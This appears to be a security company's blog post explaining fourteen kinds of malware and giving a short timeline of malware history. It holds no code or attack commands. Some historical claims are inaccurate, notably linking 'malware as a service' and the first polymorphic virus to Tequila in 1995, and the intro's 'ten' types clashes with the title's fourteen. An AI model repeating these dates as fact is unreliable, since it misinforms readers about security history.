Improve Your Cybersecurity

The 14 types of malware šŸ’£

From the floppy disks of the 1980s, to the worms of the early noughties, to the sophisticated malware of 2024, malware has been on quite the ride! In this short guide we will explore ten of the most common types of malware, including rootkits, viruses, spyware, and everything in between!

Not all malware is created equally, and some malware is dangerous than others. Malware is a combination of two words: malicious, and software. In conjunction, the two words combine to represent malicious software.Ā 

We will start by looking at each of the main types of malware, before we turn our attention to the history of malware and how it evolved over time. For each malware category, I will outline a synopsis of how it works, how dangerous it is, and how prominent it is.

The malware is listed in no particular order.

The 14 types of malware

Rootkits

Rootkits are one of the most serious forms of malware and are extremely difficult to detect and remove. Whilst most of the following forms of malware work at the operating system level, a Rootkits bury themselves deep into the computer making them almost impossible to detect by antivirus software.

Rootkits have a history dating back to the early days of computing, evolving with technology. Originally, they were associated with Unix systems, where attackers gained “root” access to the core of the operating system. As operating systems and security measures advanced, so did rootkits. In the late 20th century, rootkits became more prevalent on Windows systems. Early rootkits focused on concealing malicious processes and files, making them difficult to detect.

Ransomware

Ransomware is one of the most common forms of malware today, and can literally wipe entire businesses and organisations out if executed by an experienced hacker.

Once your computer is infected by ransomware, all of your files will be encrypted and you are required to pay cybercriminals to reattain your files. As the files are encrypted, your system becomes virtually unusable until you pay to retrieve the encryption key through some form of anonymous cryptocurrency.

There is a debate in the cybersecurity community as to the best approach to responding to ransomware attacks. Even if you pay, there is no guarantee that you will retrieve your files. And even if you did, the hackers could extort you and sell the stolen data online. Plus, if you are known to pay ransomware gangs this can make you a prime target for other criminals, as they know that if they compromise your systems then there is a high chance that they will receive lucrative ill-gotten gains.

Despite being so prominent in 2024, ransomware has a relatively long history, with early instances dating back to the late 1980s. The first known ransomware, known as the AIDS Trojan, targeted MS-DOS systems and encrypted file names, demanding payment to restore access. Over the years, ransomware evolved in sophistication and tactics, leveraging encryption to lock files securely. The rise of cryptocurrency, especially Bitcoin, in the 2010sĀ  – and more recently Monero – made it easier for attackers to receive untraceable ransom payments, contributing to the widespread growth of ransomware attacks.

Ransomware is a huge problem for both businesses and private individuals, and the problem is continuously getting worse.

Botnets

The term “botnet” is a combination of “robot” and “network.” The concept originated in the early 2000s when malicious actors started using networks of compromised computers, often called “bots” or “zombies,” to perform coordinated actions.Ā 

The first prominent botnets were used for activities like distributed denial-of-service (DDoS) attacks. In this attack, your infected computer would be added to a network of other infected computers, and each computer would be forced by the hacker to send an enormous number of requests to a webserver, thus bringing the server down.

Over time, botnets have evolved in complexity, with attackers using increasingly sophisticated methods to control and monetise these networks.

Trojans

The term “Trojan horse” originates from Greek mythology, referring to the wooden horse used by the Greeks to infiltrate the city of Troy. In the context of computing, a Trojan horse is a type of malware that disguises itself as legitimate software but contains malicious code.

The user is tricked into installing the Trojan, allowing the attacker to gain unauthorised access or perform malicious activities. The concept of Trojans has been present in computing since the early days of malware, with early instances targeting personal computers.

If you are a gamer that tries to install modifications, or mods, to enhance your game, many of these software packages will in fact be trojan horses, compromising your computer.

Ā 

Reverse Shells

A reverse shell is a technique used in computer security and penetration testing where an attacker establishes a connection from a target system to a machine controlled by the attacker. This allows the attacker to gain remote access and control over the compromised system.

The term “reverse” refers to the direction of the connection – instead of the typical client-to-server communication, the compromised system becomes the client that initiates a connection back to the attacker’s machine, which acts as the server.

What makes a reverse shell so dangerous as it bypasses outbound firewalls. Reverse shells can be effective in bypassing firewalls because outbound connections (from the compromised system) are often less restricted than inbound connections (to the compromised system).

Logic Bombs

A logic bomb is a form of malicious code that is intentionally inserted into a computer program or system with the purpose of triggering a harmful action when specific conditions are met.

Unlike many other types of malware that are designed to spread or perform malicious activities immediately, a logic bomb remains dormant until a particular event or set of circumstances occurs, at which point it is activated to execute its malicious payload.

The term “logic bomb” is derived from the idea of a time bomb, as it is set to go off based on logic or specific criteria.

So for example, a logicbomb could automatically detonate its payload on a Wednesday at 9pm, subject to the user having completed a predefined set of actions.

Worms

Worms are a type of malware that has been present in the computing landscape since the early days of networked systems. One of the earliest and most infamous worms is the Morris Worm, which was unleashed in 1988.Ā 

Created by Robert Tappan Morris, it was intended to gauge the size of the internet but ended up causing widespread disruption by exploiting vulnerabilities and replicating uncontrollably. Since then, various worms have emerged, each with its own propagation techniques and payloads.

Worms are an interesting, and incredibly dangerous form of malware. When a computer is infected, it replicates itself and other computers are infected rapidly.Ā 

Worms have evolved over time to exploit new vulnerabilities and propagate through different vectors. Modern worms often combine various propagation techniques, such as exploiting software vulnerabilities, using social engineering in phishing emails, or leveraging removable media like USB drives.

Preventive measures against worms include regular software updates to patch known vulnerabilities, implementing network security measures, using firewalls, and employing intrusion detection and prevention systems. Security awareness training helps users recognise and avoid social engineering tactics often used by worms. Incident response plans are crucial for organisations to mitigate the impact of worm infections promptly.

Despite advancements in security, worms remain a persistent threat, and cybersecurity efforts must continually adapt to the evolving landscape of these self-replicating malware.

Ā 

Spyware

Spyware is a type of malicious software designed to secretly gather information about a user or organisation without their knowledge or consent. It operates covertly, collecting sensitive data such as browsing habits, login credentials, personal information, or financial details. The gathered data is then transmitted to third parties, often for malicious purposes, such as identity theft, fraud, or unauthorised surveillance.

Spyware could involve keyloggers (where everything you type is recorded), the ability of a hacker to turn on your webcam or microphone, along with activity logs of everything that you do on your device.

Spyware is often the payload within a trojan horse, and can be used to extort you through the leaking of sensitive, private information.

Viruses

A computer virus is a type of malicious software that attaches itself to legitimate programs or files with the aim of replicating and spreading to other files or systems. Like a biological virus, computer viruses require a host to survive and propagate. They often cause harm by modifying or deleting data, disrupting system operations, or providing unauthorised access to the infected system.

Adware

Whilst adware may not be as dangerous as other forms of malware, it can be annoying and distressing, to say the least.Ā Ā 

Adware, short for advertising-supported software, is a type of software that displays unwanted advertisements on a user’s device.

While adware itself may not be inherently malicious, it can be intrusive and negatively impact the user experience by delivering unwanted ads, pop-ups, or banners.

In some cases, adware may also collect user data to personalise advertisements or track online behavior for marketing purposes.

Not all adware is malicious. Some adware could be classed as Potentially Unwanted Software, or PUA.

Fileless malware

Fileless malware is a type of malicious software that operates in a system’s volatile memory (RAM) without leaving a trace on the computer’s hard drive.Ā 

Unlike traditional malware that relies on executable files, fileless malware is designed to reside in the computer’s memory, making it more challenging to detect and analyse using conventional antivirus and anti-malware solutions.

This type of malware is more likely to be used by advanced persistent threats (APT) or more experienced hackers.

Mobile malware

Mobile malware refers to malicious software specifically designed to target mobile devices, such as smartphones and tablets.

As mobile devices have become integral to our daily lives, cybercriminals increasingly develop various forms of malware to exploit vulnerabilities, steal sensitive information, or carry out other malicious activities on these platforms.

Whilst mobile malware was almost nonexistent 15 years ago, it is becoming an increasingly prominent threat. Generally speaking, Android and jailbroken phones are more likely to be compromised than iOS devices, with the exception of Pegasus; a dangerous threat to iOS devices.

Created by the Israeli NSO group, Pegasus is a zero-click malware can infect your device with the simple act of receiving a message. I will publish an article about how Pegasus works in March 2024 – please subscribe to my newsletter to be notified when the article is published.Ā 

Polymorphic malware

Polymorphic malware is a type of malicious software that has the ability to change its code or appearance dynamically while maintaining its core functionality.Ā 

This characteristic makes it challenging for traditional antivirus programs to detect and block polymorphic malware using static signature-based methods. Polymorphic malware uses various techniques to alter its code, such as encryption, obfuscation, and code rewriting, with the aim of evading detection by security tools.

I have published an article on how polymorphic malware works, and how hackers use it to bypass antivirus and forensic software. The article is covers how antivirus works, and how it doesn’t. Click on the link to skip to the relevant section on the practical applications of polymorphic malware.

Scareware

Scareware is a type of malicious software or deceptive tactic that aims to scare or trick users into taking specific actions, typically for financial gain.Ā 

Scareware often uses alarming or misleading messages to create a sense of urgency or fear, prompting users to pay for unnecessary or fraudulent services.Ā 

It doesn’t necessarily involve the installation of harmful software but relies on social engineering to exploit users’ concerns.Ā Scareware is less prominent when compared to other forms of malware, and is arguably less dangerous.

A quick history of malware and how it evolved

Hackers and cybersecurity professionals are locked in a constantly evolving game of cat and mouse, with no clear end in sight.

From the early days of floppy disks to the advanced persistent threats (APTs) of 2024, I have tried to succinctly summarise the birth of malware all the way to how malware has evolved to where we are today in 2024.

1980s: The Birth Of Malware

1982: The first widely recognised computer virus, Elk Cloner, targeted Apple II systems. It spread via infected floppy disks.
1986: The Brain virus, the first PC virus, emerged. It infected MS-DOS boot sectors and spread through infected floppy disks.

1990s: The rise of worms and macro viruses

1992: The Michelangelo virus gained attention for triggering on March 6, damaging data on infected systems.
1995: Concept of “malware as a service” emerged with the release of the first polymorphic virus, “Tequila.”
1999: The Melissa virus, a macro virus spread via email attachments in Microsoft Word documents, highlighted the increasing danger of email-based malware.

Early 2000s:

2000: The ILOVEYOU worm spread globally via email, causing massive disruptions by overwriting files.
2001: Code Red and Nimda worms exploited vulnerabilities in Microsoft software, emphasizing the need for secure coding practices.
2004: The emergence of Spyware, such as CoolWebSearch, marked a shift towards malware focused on information theft.

Mid-2000s: Rise of trojans, botnets, and ransomware

2005: The first mobile malware, Cabir, targeted Symbian OS on mobile phones.
2008: Conficker worm exploited Windows vulnerabilities, forming one of the largest botnets and emphasising the importance of timely patching.
2010: Stuxnet, a sophisticated worm, targeted industrial systems, showcasing the potential for state-sponsored cyber-attacks.

2010s: Advanced persistent threats and ransomware

2011: Duqu, linked to Stuxnet, introduced advanced capabilities, illustrating the rise of APTs.
2013: Cryptolocker ransomware pioneered the use of strong encryption for ransom demands.
2017: WannaCry ransomware exploited a Windows vulnerability, impacting organizations globally, highlighting the need for robust cybersecurity measures.

Late 2010s to present: the evolving threat landscape

2018: Emotet emerged as a powerful Trojan, evolving into a major threat distributing various payloads.
2019: Ryuk ransomware gained prominence for targeting high-profile organisations and demanding large ransoms.
2020s: Continued growth of sophisticated ransomware attacks, supply chain attacks (e.g., SolarWinds), and the rise of fileless and living-off-the-land attacks.

Hey! Can we make it official? šŸ˜˜

I would love to share my latest ethical hacking, defensive security, OSINT, and anonymity guides with you. But I’ll need you to trust me with something… your email address. I promise not to spam you, and you can count on me to keep your data safe šŸ˜‡

Improve your cybersecurity

DNS Security 101

The 14 types of malware šŸ’£

WiFi Security 101: A Quick Guide to Safeguarding Your Network šŸ‘€

Why it’s a good idea to have multiple email addresses šŸ‘

The simple trick to protect you from 86% of Windows threats šŸ˜®

This is how you should THINK about your cybersecurity šŸ’­

Fifteen Steps to maximising firefox privacy šŸ”’āœ…

Download the complete FireFox checklist that I give to my counter-surveillance clients – completely free of charge! I will take you step-by-step through advanced Firefox Configurations that will help you maximise your privacy, security and anonymity.Ā 

Enter your details below and I will email it to you straight away. And don’t worry, your data is safe with me šŸ˜‡

Access free subscriber only content šŸ˜˜

I would love to share my latest ethical hacking, defensive security, OSINT, and anonymity guides with you. But I’ll need you to trust me with something… your email address. Your data will be encrypted and I will never sell it to third parties šŸ˜‡

UK Cybersecurity Company

About Aitken Security

Aitken Security is a UK Cybersecurity Company specialising in offensive and defensive security.